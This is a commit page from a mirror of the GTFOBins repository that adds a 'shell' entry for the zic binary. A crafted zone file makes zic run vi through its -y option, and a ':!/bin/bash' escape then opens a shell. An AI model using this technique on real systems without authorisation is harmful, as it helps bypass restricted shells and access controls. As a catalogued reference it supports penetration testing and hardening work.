1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-28 10:06:05 +02:00

Add Shell to zic.md

This commit is contained in:
tibotix 2023-07-20 17:01:04 +02:00
parent 9d438a06d9
commit 5d721ea9af
No known key found for this signature in database
GPG Key ID: 96DF02FF50AC54C7

View File

@ -13,4 +13,10 @@ functions:
echo "Rule Jordan 0 1 arg2 Jan lastSun 2 1:00d -" > zicfile
echo "Zone Test 2:00 Jordan CE%sT" >> zicfile
zic -d . -y "id" ./zicfile
shell:
- code: |
echo "Rule Jordan 0 1 arg2 Jan lastSun 2 1:00d -" > zicfile
echo "Zone Test 2:00 Jordan CE%sT" >> zicfile
zic -d . -y "vi" ./zicfile
:!/bin/bash
---